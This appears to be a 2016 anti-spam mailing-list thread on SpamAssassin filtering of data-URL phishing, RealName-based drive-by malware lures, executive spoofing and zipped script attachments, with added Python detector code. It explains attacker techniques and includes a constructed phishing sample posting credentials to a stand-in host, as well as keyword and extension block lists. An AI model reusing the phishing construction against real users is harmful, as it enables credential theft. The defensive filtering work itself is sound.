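Added example, not Chip's post-SA filter and not Olivier's plugin: a gateway-side sketch of the two ideas in this message, the Levenshtein check on the sender domain quoted from Olivier, and the rotating "[friendly-RANDOM]" Subject token added only on exact-matched money-authorizer to money-mover mail, with the token stripped again on the reply. The organisation domain, the address pools, the authorizer's submission IP, the friendly words and the sample messages are all constructed. One step goes beyond the post and is labelled as such: inbound mail that does not pass the exact match has any token-shaped text removed from its Subject, so a token that leaks cannot simply be replayed.

```python
"""Gateway 'magic token' for a tiny money-authorizer -> money-mover pool, plus a
lookalike-domain check.

Added example, not the poster's filter nor Olivier's plugin. Assumptions: the
domain, address pools, submission IP, friendly words and sample messages are
constructed. Stripping tokens from non-matching inbound mail is an addition.
"""
import hashlib
import hmac
import re
import secrets
from datetime import date

ORG_DOMAINS = {"charity.example"}
MONEY_AUTHORIZERS = {"director@charity.example"}          # the regularly spoofed sender
MONEY_MOVERS = {"bookkeeper@charity.example", "treasurer@charity.example",
                "office@charity.example"}
AUTHORIZER_SUBMIT_IPS = {"203.0.113.10"}                  # where the authorizer really sends from
FRIENDLY_WORDS = ["banana", "walrus", "teapot", "pickle"]  # chosen by the recipients
ROTATION_SECRET = secrets.token_bytes(32)                 # generated once at deploy, never mailed
TOKEN_RE = re.compile(r"\[[a-z]+-[0-9A-F]{6}\]\s*", re.I)


def week_token(day: date, secret: bytes = ROTATION_SECRET) -> str:
    """Token for the ISO week containing `day`; changes every Monday. Deriving it
    from a secret lets the printed drawer list be generated months ahead."""
    iso_year, iso_week, _ = day.isocalendar()
    mac = hmac.new(secret, f"{iso_year}-W{iso_week:02d}".encode(), hashlib.sha256).digest()
    friendly = FRIENDLY_WORDS[mac[0] % len(FRIENDLY_WORDS)]
    return f"[{friendly}-{mac[1:4].hex().upper()}]"


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_domain(sender: str, max_dist: int = 2) -> bool:
    """Sender domain within a couple of edits of one of ours, but not equal to it."""
    dom = sender.rsplit("@", 1)[-1].lower()
    return any(0 < levenshtein(dom, org) <= max_dist for org in ORG_DOMAINS)


def is_genuine_authorizer(msg: dict) -> bool:
    """Exact match only: pool membership, SPF and DKIM pass, expected submission IP."""
    return (msg["from"].lower() in MONEY_AUTHORIZERS
            and msg.get("spf") == "pass" and msg.get("dkim") == "pass"
            and msg.get("client_ip") in AUTHORIZER_SUBMIT_IPS)


def inbound_rewrite(msg: dict, today: date, secret: bytes = ROTATION_SECRET) -> dict:
    """Genuine authorizer -> mover mail gets this week's token; anything else has
    token-shaped text removed from the Subject (addition: defeats replay)."""
    out = dict(msg)
    to_movers = {a.lower() for a in msg["to"]} & MONEY_MOVERS
    if is_genuine_authorizer(msg) and to_movers:
        out["subject"] = f"{week_token(today, secret)} {msg['subject']}"
    else:
        out["subject"] = TOKEN_RE.sub("", msg["subject"]).strip()
    return out


def outbound_rewrite(msg: dict) -> dict:
    """Mover replying to an authorizer: drop the token so it never leaves the movers."""
    out = dict(msg)
    if msg["from"].lower() in MONEY_MOVERS and any(a.lower() in MONEY_AUTHORIZERS for a in msg["to"]):
        out["subject"] = TOKEN_RE.sub("", msg["subject"]).strip()
    return out


# Constructed samples.
GENUINE = {"from": "director@charity.example", "to": ["bookkeeper@charity.example"],
           "subject": "Wire for vendor", "spf": "pass", "dkim": "pass", "client_ip": "203.0.113.10"}
SPOOF = {"from": "director.charity@freemail.example", "to": ["bookkeeper@charity.example"],
         "subject": "[banana-ABC123] Wire for vendor", "spf": "pass", "dkim": "pass",
         "client_ip": "198.51.100.7"}

if __name__ == "__main__":
    print(inbound_rewrite(GENUINE, date.today())["subject"])
    print(inbound_rewrite(SPOOF, date.today())["subject"], lookalike_domain("x@charlty.example"))
```

The exact match is deliberately narrow: a RealName spoof from a freemail address passes SPF and DKIM for its own domain, which is why the sender address, not the authentication result, is the gate. The Levenshtein check is the complement for the costlier spoof Olivier describes, a registered domain one edit away from yours.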
Re: spample of "data" URL in well-crafted Phish

2016-09-14 Thread Chip M.
On Thu, 8 Sep 2016, John Hardin wrote:
>Yes. Given that ID on the first line the corpus owner can find the message 
>in question, review it, potentially fix misclassifications (that has 
>happened before), etc.

Shiny - that sounds perfect! :)

>There's one more exclusion I can add that will take out the last
>of the FPs in masscheck.

Thanks John!

Sadly, I have more FP data for you. :(
This week, two semi-well-known companies decided to join the
Embedded Data Hall of Shame:

"Overstock.com" (overstock.com)
831,744 bytes
X-Spam-Status: No, score=-3.2 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, HTML_IMAGE_RATIO_02, HTML_MESSAGE, MIME_HTML_ONLY, 
RCVD_IN_MSPIKE_H3, RCVD_IN_MSPIKE_WL, RCVD_IN_RP_CERTIFIED, RCVD_IN_RP_SAFE

"Dave & Buster's" (daveandbusters.com)
806,962 bytes
X-Spam-Status: No, score=1.8 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, HTML_IMAGE_RATIO_02, HTML_MESSAGE, MIME_HTML_ONLY, 
RCVD_IN_DNSWL_NONE

Sadly, both hit on my test for:
href='data:
So the score for that should definitely be capped.
Fortunately, all these are otherwise scoring quite low.

Here's one specific example (just a single very long line from
one corpse):
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg width='104px' 
height='82px' viewBox='0 0 104 82' version='1.1' 
xmlns='http://www.w3.org/2000/svg' 
xmlns:xlink='http://www.w3.org/1999/xlink'%3E%3C!-- Generator: Sketch 3.6.1 
(26313) - http://www.bohemiancoding.com/sketch 
--%3E%3Ctitle%3Ediamond%3C/title%3E%3Cdesc%3ECreated with 
Sketch.%3C/desc%3E%3Cdefs%3E%3C/defs%3E%3Cg id='Current' stroke='none' 
stroke-width='1' fill='none' fill-rule='evenodd'%3E%3Cg 
id='Settings-Not-Supported-Grammarly-2' transform='translate(-241.00, 
-183.00)'%3E%3Cg id='4-copy-4' transform='translate(45.00, 
41.00)'%3E%3Cg id='The-Settings' transform='translate(75.00, 
63.00)'%3E%3Cg id='Not-Suported' transform='translate(1.00, 
56.00)'%3E%3Cg id='Google-Docs' transform='translate(34.00, 
0.00)'%3E%3Cg id='diamond' transform='translate(75.00, 
0.00)'%3E%3Cimage id='Image-1' x='0' y='0.0800019' width='127.919997' 
height='127.919997' xlink:href='
Which was in a huge (700+ Kb) set of Style blocks. :(
I'll send you both corpses, tonight, if you're interested.

I took a closer look at the "ClubNorton" monstrosity and it also
hit that test, and has many other similarities, so this appears
to be a new email "authoring" app. :(

For completeness, "ClubNorton" was:
812,383 bytes
X-Spam-Status: No, score=1.0 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, HTML_MESSAGE, MIME_HTML_ONLY, RCVD_IN_DNSWL_NONE, 
RCVD_IN_MSPIKE_H3, RCVD_IN_MSPIKE_WL

That puts the inventors of the Hamster Cannon in the lead, in
terms of size and pandering to safe-listing "services". :(

I asked the recipient/survivor of the new duo to forward them to
his own account and tell me how they render in Outlook, and he
kindly sent me a screenshot, mostly to show an alert that Outlook
added:
"If there are problems with how this message is displayed, click here to view 
it in a web browser."

Purely IM(subjective)O, that sounds like even Outlook was a bit
disgruntled with it.
- "Chip"



Re: Anyone else just blocking the ".top" TLD?

2016-09-08 Thread Chip M.
On Thu, 8 Sep 2016, "lists [at] rhsoft.net" wrote:
>i get a diff-output per mail each time the mailserver configs
>are changing

That's a completely valid approach, and I am a big fan of
pre-emptive first strike (only as applied to potentially evil
email).

However, the vast majority of those TLDs will never
"go rogue", so I prefer to block on actual abuse
(Jason's approach), or likelihood of abuse, specifically, very
low cost.  Jason appears to have much higher volume than I do,
so he'd be a good source of data for me and others.

IDIC... or to each his/her own preferred approach. :)
- "Chip"




Re: Anyone else just blocking the ".top" TLD?

2016-09-08 Thread Chip M.
On Sat, 09 Jul 2016, jasonsu wrote:
>Fwiw, atm I block all of the following TLDs
...
>men,
..
>That list is auto-generated.  Any & all TLDs that have 
>sent > 100 messages within the last year *AND* have a 

Great approach Jason! :)
".men" just recently appeared in my data, and is not showing up
on that Surbl tld page.

Please do share any more that you notice. :)

".men" is going for as low as $1.49.
It's only appearing in some of my domains, but is running
between about 8% and 34% of their snowshoe spam.
- "Chip"



drive-by malware customized to the From.RealName of actual Friends

2016-09-08 Thread Chip M.
Spample:
http://puffin.net/software/spam/samples/0043_driveby_from-rn_in_url.txt
I removed 19 (of 20 original) email addresses out of the
To header, ST:TOS munged all remaining email addresses, and
munged the target URL to match the other mungings.
Everything else is exactly as received, immediately post-SA.

This campaign has been going on at a low but steady
rate (typically 0.2% to 0.4% of spam) since at least late May.
It uses very simple and effective social engineering which leads
the victim to a cracked legit-ish site, that redirects to a
drive-by malware site which is controlled by the miscreants.

*** Analysis:
The pattern is that the complete From.RealName is used as the
final subdir in the URL, with an underscore between each word
that was in the RealName.  The original cAsEs are always used
(e.g. "Montgomery Scott" goes to "/Montgomery_Scott/" and
"leonard mccoy" goes to "/leonard_mccoy/").

There's between zero and two trailing "/".
There is always a subhost, except for the earliest instances.
There are no parameters, so the final subdir STANDS OUT well,
looking like a personal/vanity website at a free provider.

All have those "Apple-Mail" boundaries.
They're usually To multiple people (20 being the most common),
but not always (particularly the early ones).
The body text is always brief with a general upbeat tone.
The Subject is almost always "Re:" (except in the beginning).


*** The impressive part is that the From.RN is always that of a
genuine Friend/correspondent, and often (about 64%) the
To.Realname is correct (otherwise it's blank, so it's never
"wrong").
The From.Address is always "wrong"/new/unknown.
The source of the data collection appears to be Yahoo account
cracks.

I've spot checked several of the URLs (using a raw HTTP tool),
and they always 302 to pure javascript booby-trapped pages at a
different domain.  I've substituted other subdir names, which
always 302 to the same (external) URL, so there's nothing 
sophisticated at that end.

The original URL is usually at a legit-ish semi-dormant GoDaddy
hosted domain.  I suspect GoDaddy must have a tool that makes it
easy to create subhosts, plus they're often targeted due to less
sophisticated endusers.  Until recently, most were never listed
on any Domain Blocklist.  Most of the redirects are eventually
taken down, though it often takes a couple of weeks.

Of the drive-by-malware sites I've checked, all have been recent
registrations (presumably by the miscreants), and typically
remain active long after the take downs of the "cracked" sites.

Today, I checked the URL in the spample, and both it and the
drive-by-malware redirect are still "live", in case any of you
would like to investigate further. :)

The very first one I spotted was only "To" me, from an old
friend.  When I saw it, my first reaction was delight and
I genuinely was drawn to visit the link... even though I was
viewing it in quarantine, and quickly spotted lots of Bad Stuff
(Received IPs tour-of-the-world).  It's simple yet VERY effective
social engineering, while being light-weight and so obvious it's
not. :\
I had noticed the pattern before, but had assumed the
Realnames/subdirs were random.  If I hadn't been sent any myself,
I probably would NOT have recognized the effectiveness of the
pattern.

I wrote a batch regression test to find these, not in real-time
but in old data so I could verify the algorithm & datamine.
Unfortunately, I've had some :( Kobayashi Maru scale "schedule
disruptions", so have NOT been able to do much testing other
than my primary Geek domains, and partial testing by one of my
best Volunteers with a highly-IDIC corpus (I'm desperate enough
I'm going to try a hotel, so I can complete this and other
critical testing).

So far, all but one FP occurred when I matched "anywhere" 
(soft match) in the URL, instead of doing a word-boundary match
on the last token.  The signature is always at the very end,
without any parameters, though it would be easy for them to
obfuscate with param(s).  Granted, that would (IMO) reduce the
efficacy of the social engineering. :)

The one exception was a Twitter URL.  Using an existing skip
domain list eliminates that case.  It's still possible to have
other FPs, so a simple match is unlikely to be a Poison Pill
candidate.

Last week, I sent John Hardin some spamples, and he very kindly
wrote & masschecked rules over the long weekend (Geek!). :)
He found a significant FP risk.

Depending on your environment (quarantines rock!), this may be
worth the risk.  The non-Bayes SA killrates for these are running
in the range of 0% to 18%. :(  Even with Bayes, most are getting
thru.  Mine are mostly being killed by Nation-of-IPs, and a few
pre-existing specialty tests (all post-SA).  I have not yet
needed to add custom rules, however I am considering it, due to
the malware risk.


I'm posting this in the hope that someone(s) will nudge GoDaddy
and other cheap hosts to scan for offsite redirects, then test
them.  

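Added example, not Chip's batch regression test: a matcher for the pattern analysed above, the From RealName joined with underscores as the LAST path segment of a URL in the body, original case, zero to two trailing slashes, no parameters, with a skip list for the one FP source the post names (Twitter). A soft "anywhere in the URL" match is included only to show why the post moved to a last-token match. The sample messages and skip list are constructed.

```python
"""Match 'From.RealName as final URL path segment' lures in a message body.

Added example, not the poster's regression test. Assumptions: SKIP_DOMAINS and
SAMPLES are constructed; the matching rules follow the analysis in the post.
"""
import re
from email.utils import parseaddr
from typing import Optional
from urllib.parse import urlsplit

SKIP_DOMAINS = {"twitter.com"}          # the FP the post hit
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)


def realname_token(from_header: str) -> Optional[str]:
    """'Montgomery Scott' -> 'Montgomery_Scott'; None when there is no display name."""
    name, _addr = parseaddr(from_header)
    name = name.strip().strip('"')
    return "_".join(name.split()) or None


def registrable(host: str) -> str:
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def hard_match(url: str, token: str) -> bool:
    """Signature is the whole last path segment, followed by nothing but 0-2 slashes."""
    p = urlsplit(url.rstrip(".,;)"))                 # trailing prose punctuation
    if p.query or p.fragment or registrable(p.hostname or "") in SKIP_DOMAINS:
        return False
    stripped = p.path.rstrip("/")
    if len(p.path) - len(stripped) > 2:
        return False
    return stripped.rsplit("/", 1)[-1] == token        # case-sensitive, whole token


def soft_match(url: str, token: str) -> bool:
    """'Anywhere in the URL' match: the FP-prone variant the post describes."""
    return token in url


def lure_urls(from_header: str, body: str, matcher=hard_match) -> list[str]:
    """All URLs in the body whose shape matches the sender's display name."""
    token = realname_token(from_header)
    if not token:
        return []
    return [u for u in URL_RE.findall(body) if matcher(u, token)]


# Constructed samples modelled on the post's description: (From header, body, expected hit).
SAMPLES = [
    ('"Montgomery Scott" <scotty.new@freemail.example>',
     "Hey! Thought you'd like this :) http://photos.dormant-site.example/Montgomery_Scott/ See you soon",
     True),
    ("leonard mccoy <lmccoy.work@freemail.example>",
     "Re: http://img.other-site.example/leonard_mccoy// cheers!", True),
    ('"Montgomery Scott" <scotty.new@freemail.example>',
     "follow me https://twitter.com/Montgomery_Scott", False),          # skip-listed
    ('"Montgomery Scott" <scotty.new@freemail.example>',
     "see http://site.example/Montgomery_Scott/album/?id=3", False),    # not last token, has params
]

if __name__ == "__main__":
    for frm, body, _ in SAMPLES:
        print(lure_urls(frm, body), lure_urls(frm, body, matcher=soft_match))
```

Run on the samples, the hard match fires on the first two and stays quiet on the Twitter profile and the parameterised URL, while the soft match fires on all four, which is the FP class the post reports. As the post notes, a hit on its own is not poison-pill material; it is a strong meta component next to a new From address and a "tour-of-the-world" Received chain.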
Re: spample of "data" URL in well-crafted Phish

2016-09-08 Thread Chip M.
On Sat, 3 Sep 2016, John Hardin wrote:
>I've tweaked the FP avoidance a bit, maybe that will be enough
>to get the S/O up high enough to publish it.

John, do you have any detailed info about the Ham hits?

I just datamined my three best corpora, from the beginning of
2014 thru this weekend, and found zero FPs, except for two hits
on that "img" test.  My data does NOT prove it's impossible for
anybody else, but it does seem odd, so I'm wondering if the
SA MassCheck mechanism has some means for the contributor to
pull out the corpses of specific hits.
If it doesn't, that would be a cool feature to add. :)


On Wed, 31 Aug 2016, Axb wrote:
>IMG src="data  can FP a lot.

AXB,
You are correct.
A few months ago, I had moved that rule in with my other "data"
rules, apparently because they had the token "data" in common.

I dug thru my notes, and the image rule was originally added to
combat a semi-subtle snowshoe campaign sent via Linode (as hosts,
they're much better than the other big-cheap-VPSs, so I've been
resisting scoring their IP blocks, which means that snow sent
thru them is sometimes harder to catch).

When I checked all data for 2014 to now in my three best corpora
(about 840 K-spam), I found that all the image spam hits were in
snow, and were NOT overtly dangerous, whereas all the non-image
"data" stuff has been in well-crafted Phish (UBER-dangerous).

There were exactly two Ham hits, and both were :grind-teeth:
ostensibly legitimate, albeit non-urgent.

Perhaps ironically or merely sadly, one was an 800 Kb monstrosity
of HTML badness (yes, all in one single Part), with several 
images and :cringe: fonts inlined via "data" statements.  When I
tried to view it as an HTML page in my raw corpse viewer (using
an old-ish open source HTML rendering engine), it ground away
for a while then died. :(
Who was the Sender?
Norton.
Yes, THAT Norton.
... and the Subject header was:
"ClubNorton Newsletter: Avoiding Social Engineering Tricks on Social Networks"

I've been scoring my data img rule at about 2.3 so it's well
below Poison Pill, and would not have caused either of those two
Hams to die.  Though I would not have lost sleep over a
Mercy Killing of the "ClubNorton" monstrosity. ;)

Bottom-line:
I strongly recommend a high scoring non-img "data" rule, and
gently recommend a modest scoring img "data" rule.
Everyone's mileage will vary, as always. :)
- "Chip"

P.S. Javascript... I agree 100% with John, while respecting AXB's
right to disagree and choose his own poison. ;)
I'll describe what I'm doing later, in a separate thread.
It's flexible enough to provide good protection, while letting
in all but the self-injurious Ham (e.g. someone at Amazon drank
some of the ClubNorton koolaid).




spample of "data" URL in well-crafted Phish

2016-08-31 Thread Chip M.
Freshly caught Spample:
http://puffin.net/software/spam/samples/0042_data_embedded_phish.txt
The only munging was inserting ".EXAMPLE" between "wellsfargo"
and ".com".

Four years ago, I read this fascinating article:
http://isc.sans.edu/diary/%22Data%22+URLs+used+for+in-URL+phishing/13996
and promptly added a simple word test to score these.

At the time, I had no idea whether these occurred in Ham
(seemed unlikely, but some Hammers are stunningly "thick"
(*cough, iframe, un-cough*)).

Since then, I've seen a steady, very low volume of spam hits,
with zero Ham hits (volume of about a quarter million emails
per month).
Yes, "ZERO" Ham. :)


Most of them have followed the same pattern that's in this
spample:
The MIME encoded "data" URL decodes to a classic Phish page.
Inside that, there's usually a small encoded bit of javascript,
typically starting with:
document.write(unescape('
In this case, it decodes to (target URL munged/replaced):
http://EXAMPLE.COM/wp-content/uploads/vrr.php" 
class="button" method="post" name="submit" id="submit">'

I just did a raw HTTP GET on the actual final URL, and it
returned a 302 with a Location of (genuine) Wellsfargo, with a
parameter starting with:
/login?ERROR_CODE=
followed by a 36-character-long code.

I did another raw GET of that Location, and it returned a 302
with a Location of WF's plain URL (no parameters), and the
document body was a terse, semi-"offshore"-speak:
This document you requested has moved temporarily.

It appears someone reported it to WF, who successfully did a
take down, but instead of providing a pedagogic page that
explained that the victim would have been toast, they chose just
to passively track accesses. :(


** Mitigation:
The easiest way to catch these is with a simple body word match.
Here's the exact matches I am currently using (some of them are
recent additions, listed in date of addition order):
href="data:
href='data:
http://data:
data:text/html;base64

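Added example, not Chip's filter: the body-literal matches listed above, the high/modest split between a non-image "data:" URL and an <img src="data:..."> that the follow-up in this thread settles on, and the unwrapping the post does by hand, decoding a base64 data:text/html link and then the document.write(unescape('...')) inside it to recover the form target. The two scores, the sample body and the embedded javascript are constructed; the body is assumed to be already MIME-decoded (transfer encoding removed).

```python
"""Find 'data:' URLs in an HTML body, score them, and unwrap the phish page.

Added example, not the poster's filter. Assumptions: SCORE_NONIMG, the sample
body and its javascript are constructed; WORD_MATCHES and SCORE_IMG come from
the posts in this thread.
"""
import base64
import re
from urllib.parse import quote, unquote

WORD_MATCHES = ['href="data:', "href='data:", "http://data:", "data:text/html;base64"]
SCORE_NONIMG = 6.0   # assumption: poison-pill level for a non-image data: URL
SCORE_IMG = 2.3      # the post's score for an inlined image

DATA_URL_RE = re.compile(
    r"""(?P<attr>href|src)\s*=\s*["']?\s*data:(?P<mime>[\w.+/-]*)(?P<params>(?:;[\w=-]+)*),(?P<data>[^"'\s>]+)""",
    re.I)
UNESCAPE_RE = re.compile(r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
HTTP_URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def find_data_urls(body: str) -> list[dict]:
    """Every href=/src= data: URL with attribute, MIME type and decoded content."""
    found = []
    for m in DATA_URL_RE.finditer(body):
        mime, raw = m.group("mime").lower(), m.group("data")
        if ";base64" in m.group("params").lower():
            try:
                content = base64.b64decode(raw + "=" * (-len(raw) % 4))
            except ValueError:
                content = b""
        else:
            content = unquote(raw).encode()
        found.append({"attr": m.group("attr").lower(), "mime": mime,
                      "is_image": mime.startswith("image/"), "content": content})
    return found


def payload_urls(html: str) -> list[str]:
    """Decode document.write(unescape('...')) blobs and pull out the URLs they hide."""
    urls = []
    for _quote, escaped in UNESCAPE_RE.findall(html):
        urls.extend(HTTP_URL_RE.findall(unquote(escaped)))
    return urls


def score_body(body: str) -> dict:
    """Score each rule once (capped, as the post suggests) and report what was unwrapped."""
    hits = {"literals": [w for w in WORD_MATCHES if w.lower() in body.lower()],
            "nonimg": 0, "img": 0, "hidden_urls": []}
    for d in find_data_urls(body):
        if d["is_image"] and d["attr"] == "src":
            hits["img"] += 1
        else:
            hits["nonimg"] += 1
            if d["mime"].startswith("text/html"):
                hits["hidden_urls"] += payload_urls(d["content"].decode("utf-8", "replace"))
    score = (SCORE_NONIMG if hits["nonimg"] else 0.0) + (SCORE_IMG if hits["img"] else 0.0)
    return {"score": score, **hits}


# Constructed sample (not the spample from the post): a base64 data: link whose page
# carries the unescape()'d form posting to a cracked WordPress upload dir, plus a
# harmless inline image of the kind that only hits the modest img rule.
_PHISH_FORM = '<form action="http://cracked.example/wp-content/uploads/vrr.php" method="post">'
_PHISH_PAGE = ("<html><body><h1>Verify your account</h1><script>document.write(unescape('"
               + quote(_PHISH_FORM, safe="") + "'))</script></body></html>")
SAMPLE_BODY = (
    '<p>Please <a href="data:text/html;base64,'
    + base64.b64encode(_PHISH_PAGE.encode()).decode()
    + '">confirm your identity</a>.</p>'
    '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAAAAAA6fptVAAAACklEQVR4nGNiAAAABgADNjd8qAAAAABJRU5ErkJggg==">'
)

if __name__ == "__main__":
    print(score_body(SAMPLE_BODY))
```

Scoring once per rule rather than once per hit is what keeps the 800 KB newsletters from earlier in the thread, with dozens of inlined SVG and font data: URLs, from tripping the poison pill; the recovered action URL is what you would feed to the URIBL/DBL lookups, since the data: link itself has no host to query.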

Re: SA cannot block messages with attached zip

2016-07-13 Thread Chip M.
On Wed, 8 Jun 2016 17:23:59 -0400 Alex wrote:
>Meanwhile, there is RTF spam that's circulating which is
>currently bypassing the sanesecurity sigs. I've just submitted a
>sample to Steve, but the db hasn't yet been updated. Here's a
>sample:
>
>http://pastebin.com/ALsSAmwa

Alex, thanks for the spample! :)
I've seen a steady trickle of those, since late April.

That file attachment is actually the way-kewl "Office Open XML"
format, with an embedded VBA binary file, just like last week's
main vector for "Zepto" (a new ransomware morph), except those
used the (more correct) file extension ".docm".

The way-kewl thing about this file format is that they're
completely standard zip files, containing a mix of other mostly
standard files (e.g. XML, JPEGs).  In general, they're very easy
to parse (no obscure Microsoft OLE/etc in the main files).
The VBA is always in a file named "vbaproject.bin".

Since filenames in zip files are stored unaltered, it's just a
matter of de-MIME-ing the file, and scanning for the filename.
You do _NOT_ have to parse the zip file, just look for that one
simple string. :)
(Pedantic note:  Technically, there's another file named
"vbaProject.bin.rels" which is a plain text XML file.
Theoretically, you may want to exclude it, but practically, I
wouldn't bother - it seems to always occur with the binary ".bin"
file, so just nuke/quarantine them all.)

A couple of years ago, I changed my post-SA Filter so it always
tests the first few "raw" characters of every MIME Part, and if
they're the prefix that means PKZip, I de-MIME it and send it
thru my zip analyzer, regardless of ContentType or file ext.
I got fed up with all the Spammer Stupid Part Tricks, and it's
blindingly fast to check the prefix. :)
- "Chip"

P.S.  Thanks everyone for the followups on how Foxhole handles
stuff. :)

P.P.S.  Today's new malware morph is a single zipped javascript
file, where the script filename ends with "..wsf".
Is the double dot just a mistake, or does that confuse anything?




Re: Anyone else just blocking the ".top" TLD?

2016-07-09 Thread Chip M.
Thanks for all the lists and references, everyone! :)

+1 on block-by-default combined with "skips" for the VERY rare
exceptions.
I'm scoring (poison pill level), not gateway blocking (more about
that in a later post).

*** New Snow TLD sighting:
Since June 30, the TLD ".stream" has been snowballing, and 
now (in my data) is occurring at a greater volume than ".top".
As of July 7, it's present in more than half of _ALL_ my
snowshoe spam.

While researching it, I found this handy "Cheapest Domain
Prices" site:
https://www.domcomp.com/tld/stream
https://www.domcomp.com/tld/top
The ever-anti-reliable NameCheap is beating the pack at $0.88 per
.stream domain (same as their price for .top), so I expect the
popularity of .stream to continue.
- "Chip"




Re: Catching well directed spear phishing messages

2016-06-28 Thread Chip M.
On Tue, 28 Jun 2016 14:13:57 + David Jones wrote:
>If I search the Internet for the CEO/CIO/CTO/etc of a company
>and send and email from my domain but make the displayed name
>in the visible From: be that CEO/CIO/CTO/etc's full name that
>the recipient is used to seeing in the mail client, then I have
>spoofed nothing detectable in advance by SA or any mail filter
>technology.

Excellent summary!
The key is that the number of spoofed people is extremely SMALL,
and we _CAN_ anticipate who they are.

It's easy to write a CUSTOM set of rules just for actual/likely
targeted senders (CEO/etc).
For each person/target, create a rule that tests an explicit
list of that person's normal Realname(s) (including reasonable
variations), against the Realname part of the From header, and
if there's a match, test whether the From Address is in a list
of allowed addresses.  Score only if it's a probable phish
Realname from an unknown/unallowed address.

There's lots of potential metas for even a low-scoring rule
(e.g John Hardin's tip).

I've been doing this since 2009, both on a generic basis
(built into my "phishy tokens in headers" anti-phish system),
and on a custom domain level as we notice/anticipate targeted
individuals (all in my post-SA filter - sorry, I have no
examples of SA rules, and am ASSuming they'll be easy to write).

It works extremely well and is easy to maintain. :)


*** Implementation issues:

1. There's potential for name collision, however these would be
manually generated rules, so the maintainer would use his/her
judgement to assign scores.  For example, "Mark Sheppard" is
more likely to have a collision than "Chiwetel Ejiofor". :)

It would be straightforward to add an explicit list of (sender
verified) email addresses to exclude from testing.

In the seven years I've been doing this, I have had zero
collisions, however I have had an occasional FP when a targeted
sender starts sending stuff from himself using a new personal
email address, and does not notify the email admin.  In those
cases, even without a quarantine, the sender should notice it.
A smart quarantine always makes life better.

2. Ideally, one should remove chaff (including potentially
obfuscatory middle initials) and excess whitespace from each
email's From Realname before doing the comparisons.

3. A big issue is fuzzing of Realnames, which is name dependent.
For most Westerners, most spelling variations in "Mark Sheppard"
are much easier to notice than in "Chiwetel Ejiofor".  Leaving
out one of the double-ps in "Sheppard" would be a sensible
variation to add to his (hypothetical) list.

I have not yet noticed any fuzzing "in the wild", however all of
my targets have extremely "anglo" names.  I recommend looking at
tools that create fuzzy variations.

I have seen MANY fuzzes of big non-spear phish targets
(e.g. "paypa1" "paypa"), and have been adding them as they occur.
I plan to add a fuzzy algorithm during my next dev cycle.

4. As John Wilcock mentions, fuzzy domains are an issue.
If you're a target, it's worth generating a list of most likely
variations, then score/block the un-registered ones, and make an
informed decision on the rest.

5. I STRONGLY recommend scoring all "ACE prefix" domains, to
reduce/eliminate all the subtle and/or invisible variations.
We've been doing that for two years, and so far have had 
zero "skip" domain requests.  Note that all our domains are
"Western" centric, though we have a few accounts who do have
regular contact with Unicode-type nations.
You all know your own email ecologies. :)


+1 to all the sensible remarks about good authorization policies.
The best defense has as many layers as practical. :)
- "Chip"



Re: SA cannot block messages with attached zip

2016-06-08 Thread Chip M.
At 04:07 AM 5/20/2016, Dianne/RoaringPenguin wrote:
>We list the contents of attached archives 
>(using "lsar") and have filename-extension rules that block .js 
>inside .zip files. While this can lead to some FPs, which we handle 
>with selective whitelisting, it's very effective at catching the 
>latest crop of cryptolocker-style attacks.

I was looking more closely at the Foxhole page, and it SOUNDS
(to me) like they do _NOT_ block on ".js" file extension,
whereas you/Dianne do:

"This database will block most JavaScript (.js) files within Zip, Rar 
files"
...
"To help minimise false positives, this database will only scan small sized Zip 
and Rar files."

*** Questions:
*1. Could someone clarify whether Foxhole is using some sort of
signatures on ".js" files?

*2. How did Foxhole perform on the recent campaign with duplicate
large zipped js files (e.g. 5 files of 236 kilobytes each)?
There was also a campaign with a single large file (e.g. 604
kilobytes), with most of the payload at the end.  I suspect both
campaigns were attempts to bypass sig based scanners.

I'm with Dianne on outright blocking js files, AND making highly
selective holes for specific sender/recipient pairs.
I protect a few thousand accounts and we only have a handful of
those holes, all for web designers.
"Aim small, miss small" :)

In my previous post, I mentioned "secret sauce" code to detect
javascript obfuscations.  That's a backup in case netscum figure
out a way to use a non obvious file extension.  FIRST, I do all
the quick tests (file extensions, etc), then, if there's enough
time, the slower/memory-heavy tests.  The recent large js file
campaigns took significantly longer (1/2 to 1 second) to do my
extra tests, but still hit all my tests. :)


*3. Is the list of file extensions on the Foxhole page complete?
http://sanesecurity.com/foxhole-databases/
The page is missing the following (and perhaps others):
.acm
.ax
.dll
.drv
.efi
.mui
.ocx
.tsp
I verified that all of those actually occur and are executable
on a Windows7 machine.


I have seen, in the wild (about a year or so ago), malware email
that instructed the target to rename the attached file. :(
Long before that, I had added code to decompress just the first
few bytes of each zipped file, and check for executable
MagicNumbers (e.g. Windows' "MZ").  I also check all MIME parts
(I have a very speedy "MIME Prefix" test).

I recently added the MagicNumber for "old" style doc files, just
for files inside zips (when they appeared, as mentioned in my
previous post).  That does have a higher FP risk, since it's
reasonable to zip huge doc files, however in practice they're
rare, and I have an excellent Quarantine/FP pipeline.

A friend sent me this cool MagicNumber look up site:
filesignatures.net
Any other suggestions for file types to add?
- "Chip"



Re: SA cannot block messages with attached zip

2016-05-20 Thread Chip M.
At 04:07 AM 5/20/2016, RoaringPenguin wrote:
>filename-extension rules that block .js 
>inside .zip files.

+1

We also block these scripting related Windows extensions:
.hta
.jse
.vbs
.wsf
Those were originally "pre-emptive", however I've now seen
both ".hta" and ".jse" in the wild (low volume).

*** Question:
Are there any other Windows (or Mac) scripting file extensions?


As an extra layer of defense, We also do content scanning within
all zipped files for terms including (among MANY others):
activexobject
base64_decode
createobject
eval
fromcharcode
savetofile
shell
unescape
wscript
All hits are weighted, and some can be skip-listed.
 
